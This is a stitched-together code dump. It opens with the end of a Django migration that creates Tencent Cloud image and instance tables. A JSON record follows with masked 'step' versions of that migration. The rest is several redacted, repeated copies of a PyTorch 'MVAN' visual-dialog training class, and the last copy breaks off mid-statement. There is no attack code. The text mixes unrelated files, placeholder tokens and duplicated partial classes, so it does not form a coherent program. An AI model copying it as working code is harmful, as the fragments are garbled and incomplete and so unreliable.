('created_time', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u65f6\u95f4')),
('image_state', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u72b6\u6001')),
('image_source', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u6765\u6e90')),
('image_name', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u540d\u79f0')),
('image_description', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u8be6\u7ec6\u63cf\u8ff0')),
('image_creator', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u8005')),
('operation_mask', models.CharField(max_length=50, verbose_name='')),
],
options={
'db_table': 'qcloud_image_info',
},
),
migrations.CreateModel(
name='QcloudInstanceInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('instance_id', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8bid')),
('instance_name', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u540d\u79f0')),
('instance_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7c7b\u578b')),
('cpu', models.CharField(max_length=50, verbose_name='cpu')),
('memory', models.CharField(max_length=50, verbose_name='\u5185\u5b58')),
('status', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u72b6\u6001')),
('zone', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u6240\u5c5e\u5730\u57df')),
('instance_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u8ba1\u8d39\u6a21\u5f0f')),
('private_ip_addresses', models.CharField(max_length=50, verbose_name='\u5185\u7f51ip')),
('public_ip_addresses', models.CharField(max_length=50, verbose_name='\u5916\u7f51ip')),
('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
('os_name', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
('system_disk_type', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u7c7b\u578b')),
('system_disk_size', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u5c3a\u5bf8')),
('renew_flag', models.CharField(max_length=50, verbose_name='\u81ea\u52a8\u7eed\u8d39\u6807\u8bc6')),
('internet_max_bandwidth_out', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u5e26\u5bbd\u4e0a\u9650')),
('internet_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u8ba1\u8d39\u7c7b\u578b')),
('created_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u521b\u5efa\u65f6\u95f4')),
('expired_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u5230\u671f\u65f6\u95f4')),
],
options={
'db_table': 'qcloud_instance_info',
},
),
]
|
flexible
|
{
"blob_id": "a1db566f4da16e7725212aeab29e946ef7c1672e",
"index": 5610,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('home_application', '0019_auto_20170809_1810')]\n operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(\n 'id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('image_id', models.\n CharField(max_length=50, verbose_name='镜像id')), ('osname', models.\n CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',\n models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (\n 'image_type', models.IntegerField(verbose_name='镜像类型')), (\n 'created_time', models.CharField(max_length=50, verbose_name=\n '镜像创建时间')), ('image_state', models.CharField(max_length=50,\n verbose_name='镜像状态')), ('image_source', models.CharField(max_length\n =50, verbose_name='镜像来源')), ('image_name', models.CharField(\n max_length=50, verbose_name='镜像名称')), ('image_description', models.\n CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',\n models.CharField(max_length=50, verbose_name='镜像创建者')), (\n 'operation_mask', models.CharField(max_length=50, verbose_name=''))\n ], options={'db_table': 'qcloud_image_info'}), migrations.\n CreateModel(name='QcloudInstanceInfo', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('instance_id', models.CharField(max_length=50,\n verbose_name='实例id')), ('instance_name', models.CharField(\n max_length=50, verbose_name='实例名称')), ('instance_type', models.\n CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.\n CharField(max_length=50, verbose_name='cpu')), ('memory', models.\n CharField(max_length=50, verbose_name='内存')), ('status', models.\n CharField(max_length=50, verbose_name='实例状态')), ('zone', models.\n CharField(max_length=50, verbose_name='实例所属地域')), (\n 'instance_charge_type', models.CharField(max_length=50,\n verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(\n max_length=50, verbose_name='内网ip')), ('public_ip_addresses',\n models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',\n models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',\n models.CharField(max_length=50, verbose_name='操作系统名称')), (\n 'system_disk_type', models.CharField(max_length=50, verbose_name=\n '系统盘类型')), ('system_disk_size', models.CharField(max_length=50,\n verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=\n 50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.\n CharField(max_length=50, verbose_name='实例网络带宽上限')), (\n 'internet_charge_type', models.CharField(max_length=50,\n verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(\n default=django.utils.timezone.now, verbose_name='实例创建时间')), (\n 'expired_time', models.DateTimeField(default=django.utils.timezone.\n now, verbose_name='实例到期时间'))], options={'db_table':\n 'qcloud_instance_info'})]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n dependencies = [('home_application', '0019_auto_20170809_1810')]\n operations = [migrations.CreateModel(name='QcloudImageInfo', fields=[(\n 'id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('image_id', models.\n CharField(max_length=50, verbose_name='镜像id')), ('osname', models.\n CharField(max_length=50, verbose_name='操作系统名称')), ('image_size',\n models.CharField(max_length=50, verbose_name='操作系统容量(GiB)')), (\n 'image_type', models.IntegerField(verbose_name='镜像类型')), (\n 'created_time', models.CharField(max_length=50, verbose_name=\n '镜像创建时间')), ('image_state', models.CharField(max_length=50,\n verbose_name='镜像状态')), ('image_source', models.CharField(max_length\n =50, verbose_name='镜像来源')), ('image_name', models.CharField(\n max_length=50, verbose_name='镜像名称')), ('image_description', models.\n CharField(max_length=50, verbose_name='镜像详细描述')), ('image_creator',\n models.CharField(max_length=50, verbose_name='镜像创建者')), (\n 'operation_mask', models.CharField(max_length=50, verbose_name=''))\n ], options={'db_table': 'qcloud_image_info'}), migrations.\n CreateModel(name='QcloudInstanceInfo', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('instance_id', models.CharField(max_length=50,\n verbose_name='实例id')), ('instance_name', models.CharField(\n max_length=50, verbose_name='实例名称')), ('instance_type', models.\n CharField(max_length=50, verbose_name='实例类型')), ('cpu', models.\n CharField(max_length=50, verbose_name='cpu')), ('memory', models.\n CharField(max_length=50, verbose_name='内存')), ('status', models.\n CharField(max_length=50, verbose_name='实例状态')), ('zone', models.\n CharField(max_length=50, verbose_name='实例所属地域')), (\n 'instance_charge_type', models.CharField(max_length=50,\n verbose_name='实例计费模式')), ('private_ip_addresses', models.CharField(\n max_length=50, verbose_name='内网ip')), ('public_ip_addresses',\n models.CharField(max_length=50, verbose_name='外网ip')), ('image_id',\n models.CharField(max_length=50, verbose_name='镜像id')), ('os_name',\n models.CharField(max_length=50, verbose_name='操作系统名称')), (\n 'system_disk_type', models.CharField(max_length=50, verbose_name=\n '系统盘类型')), ('system_disk_size', models.CharField(max_length=50,\n verbose_name='系统盘尺寸')), ('renew_flag', models.CharField(max_length=\n 50, verbose_name='自动续费标识')), ('internet_max_bandwidth_out', models.\n CharField(max_length=50, verbose_name='实例网络带宽上限')), (\n 'internet_charge_type', models.CharField(max_length=50,\n verbose_name='实例网络计费类型')), ('created_time', models.DateTimeField(\n default=django.utils.timezone.now, verbose_name='实例创建时间')), (\n 'expired_time', models.DateTimeField(default=django.utils.timezone.\n now, verbose_name='实例到期时间'))], options={'db_table':\n 'qcloud_instance_info'})]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home_application', '0019_auto_20170809_1810'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='QcloudImageInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image_id', models.CharField(max_length=50, verbose_name='\\u955c\\u50cfid')),\n ('osname', models.CharField(max_length=50, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf\\u540d\\u79f0')),\n ('image_size', models.CharField(max_length=50, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf\\u5bb9\\u91cf\\uff08GiB\\uff09')),\n ('image_type', models.IntegerField(verbose_name='\\u955c\\u50cf\\u7c7b\\u578b')),\n ('created_time', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u521b\\u5efa\\u65f6\\u95f4')),\n ('image_state', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u72b6\\u6001')),\n ('image_source', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u6765\\u6e90')),\n ('image_name', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u540d\\u79f0')),\n ('image_description', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u8be6\\u7ec6\\u63cf\\u8ff0')),\n ('image_creator', models.CharField(max_length=50, verbose_name='\\u955c\\u50cf\\u521b\\u5efa\\u8005')),\n ('operation_mask', models.CharField(max_length=50, verbose_name='')),\n ],\n options={\n 'db_table': 'qcloud_image_info',\n },\n ),\n migrations.CreateModel(\n name='QcloudInstanceInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('instance_id', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8bid')),\n ('instance_name', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u540d\\u79f0')),\n ('instance_type', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u7c7b\\u578b')),\n ('cpu', models.CharField(max_length=50, verbose_name='cpu')),\n ('memory', models.CharField(max_length=50, verbose_name='\\u5185\\u5b58')),\n ('status', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u72b6\\u6001')),\n ('zone', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u6240\\u5c5e\\u5730\\u57df')),\n ('instance_charge_type', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u8ba1\\u8d39\\u6a21\\u5f0f')),\n ('private_ip_addresses', models.CharField(max_length=50, verbose_name='\\u5185\\u7f51ip')),\n ('public_ip_addresses', models.CharField(max_length=50, verbose_name='\\u5916\\u7f51ip')),\n ('image_id', models.CharField(max_length=50, verbose_name='\\u955c\\u50cfid')),\n ('os_name', models.CharField(max_length=50, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf\\u540d\\u79f0')),\n ('system_disk_type', models.CharField(max_length=50, verbose_name='\\u7cfb\\u7edf\\u76d8\\u7c7b\\u578b')),\n ('system_disk_size', models.CharField(max_length=50, verbose_name='\\u7cfb\\u7edf\\u76d8\\u5c3a\\u5bf8')),\n ('renew_flag', models.CharField(max_length=50, verbose_name='\\u81ea\\u52a8\\u7eed\\u8d39\\u6807\\u8bc6')),\n ('internet_max_bandwidth_out', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u7f51\\u7edc\\u5e26\\u5bbd\\u4e0a\\u9650')),\n ('internet_charge_type', models.CharField(max_length=50, verbose_name='\\u5b9e\\u4f8b\\u7f51\\u7edc\\u8ba1\\u8d39\\u7c7b\\u578b')),\n ('created_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\\u5b9e\\u4f8b\\u521b\\u5efa\\u65f6\\u95f4')),\n ('expired_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\\u5b9e\\u4f8b\\u5230\\u671f\\u65f6\\u95f4')),\n ],\n options={\n 'db_table': 'qcloud_instance_info',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MVAN(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
evaluation = Evaluation(self.hparams, model=self.model, split='val')
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0
train_begin = datetime.utcnow()
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
combined_dataloader = itertools.chain(self.train_dataloader)
print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch['img_ids'].shape[0]
if (self.hparams.virtual_batch_size == accumulate_batch or
i == len(self.train_dataset) // self.hparams.
train_batch_size):
self.optimizer.step()
if running_loss > 0.0:
running_loss = (0.95 * running_loss + 0.05 *
batch_loss.item())
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.optimizer
.param_groups[0]['lr']))
tqdm_batch_iterator.set_description(description)
if (global_iteration_step % self.hparams.
tensorboard_step == 0):
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.
optimizer.param_groups[0]['lr']))
self._logger.info(description)
self.summary_writer.add_scalar('train/loss',
batch_loss, global_iteration_step)
self.summary_writer.add_scalar('train/lr', self.
optimizer.param_groups[0]['lr'],
global_iteration_step)
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager
.ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
self._logger.info(self.previous_model_path)
if (epoch < self.hparams.num_epochs - 1 and self.hparams.
dataset_version == '0.9'):
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path,
global_iteration_step, self.summary_writer, os.path.join(
self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
epoch))
torch.cuda.empty_cache()
return self.previous_model_path
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MVAN(object):
<|reserved_special_token_0|>
def _build_dataloader(self):
old_split = 'train' if self.hparams.dataset_version == '0.9' else None
self.train_dataset = VisDialDataset(self.hparams, overfit=self.
hparams.overfit, split='train', old_split=old_split)
collate_fn = None
if 'dan' in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(self.train_dataset, batch_size=
self.hparams.train_batch_size, num_workers=self.hparams.
cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)
print(
"""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
"""
)
def _build_model(self):
print('\t* Building model...')
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print('Encoder: {}'.format(self.hparams.encoder))
print('Decoder: {}'.format(self.hparams.decoder))
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.
hparams.glove_npy))
print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)
)
decoder.word_embed = encoder.word_embed
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
if 'disc' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif 'gen' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.
train_dataset.vocabulary.PAD_INDEX)
if self.hparams.training_splits == 'trainval':
self.iterations = (len(self.train_dataset) + len(self.
valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset
) // self.hparams.virtual_batch_size
def lr_lambda_fun(current_iteration: int) ->float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0
] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.
lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == 'LambdaLR':
self.optimizer = optim.Adam(self.model.parameters(), lr=self.
hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer,
lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
evaluation = Evaluation(self.hparams, model=self.model, split='val')
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0
train_begin = datetime.utcnow()
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
combined_dataloader = itertools.chain(self.train_dataloader)
print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch['img_ids'].shape[0]
if (self.hparams.virtual_batch_size == accumulate_batch or
i == len(self.train_dataset) // self.hparams.
train_batch_size):
self.optimizer.step()
if running_loss > 0.0:
running_loss = (0.95 * running_loss + 0.05 *
batch_loss.item())
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.optimizer
.param_groups[0]['lr']))
tqdm_batch_iterator.set_description(description)
if (global_iteration_step % self.hparams.
tensorboard_step == 0):
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.
optimizer.param_groups[0]['lr']))
self._logger.info(description)
self.summary_writer.add_scalar('train/loss',
batch_loss, global_iteration_step)
self.summary_writer.add_scalar('train/lr', self.
optimizer.param_groups[0]['lr'],
global_iteration_step)
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager
.ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
self._logger.info(self.previous_model_path)
if (epoch < self.hparams.num_epochs - 1 and self.hparams.
dataset_version == '0.9'):
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path,
global_iteration_step, self.summary_writer, os.path.join(
self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
epoch))
torch.cuda.empty_cache()
return self.previous_model_path
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MVAN(object):
def __init__(self, hparams):
self.hparams = hparams
self._logger = logging.getLogger(__name__)
np.random.seed(hparams.random_seed[0])
torch.manual_seed(hparams.random_seed[0])
torch.cuda.manual_seed_all(hparams.random_seed[0])
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
self.device = torch.device('cuda', self.hparams.gpu_ids[0]
) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')
setproctitle(hparams.dataset_version + '_' + hparams.model_name +
'_' + str(hparams.random_seed[0]))
def _build_dataloader(self):
old_split = 'train' if self.hparams.dataset_version == '0.9' else None
self.train_dataset = VisDialDataset(self.hparams, overfit=self.
hparams.overfit, split='train', old_split=old_split)
collate_fn = None
if 'dan' in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(self.train_dataset, batch_size=
self.hparams.train_batch_size, num_workers=self.hparams.
cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)
print(
"""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
"""
)
def _build_model(self):
print('\t* Building model...')
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print('Encoder: {}'.format(self.hparams.encoder))
print('Decoder: {}'.format(self.hparams.decoder))
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.
hparams.glove_npy))
print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)
)
decoder.word_embed = encoder.word_embed
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
if 'disc' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif 'gen' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.
train_dataset.vocabulary.PAD_INDEX)
if self.hparams.training_splits == 'trainval':
self.iterations = (len(self.train_dataset) + len(self.
valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset
) // self.hparams.virtual_batch_size
def lr_lambda_fun(current_iteration: int) ->float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0
] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.
lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == 'LambdaLR':
self.optimizer = optim.Adam(self.model.parameters(), lr=self.
hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer,
lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
evaluation = Evaluation(self.hparams, model=self.model, split='val')
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0
train_begin = datetime.utcnow()
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
combined_dataloader = itertools.chain(self.train_dataloader)
print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch['img_ids'].shape[0]
if (self.hparams.virtual_batch_size == accumulate_batch or
i == len(self.train_dataset) // self.hparams.
train_batch_size):
self.optimizer.step()
if running_loss > 0.0:
running_loss = (0.95 * running_loss + 0.05 *
batch_loss.item())
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.optimizer
.param_groups[0]['lr']))
tqdm_batch_iterator.set_description(description)
if (global_iteration_step % self.hparams.
tensorboard_step == 0):
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.
optimizer.param_groups[0]['lr']))
self._logger.info(description)
self.summary_writer.add_scalar('train/loss',
batch_loss, global_iteration_step)
self.summary_writer.add_scalar('train/lr', self.
optimizer.param_groups[0]['lr'],
global_iteration_step)
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager
.ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
self._logger.info(self.previous_model_path)
if (epoch < self.hparams.num_epochs - 1 and self.hparams.
dataset_version == '0.9'):
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path,
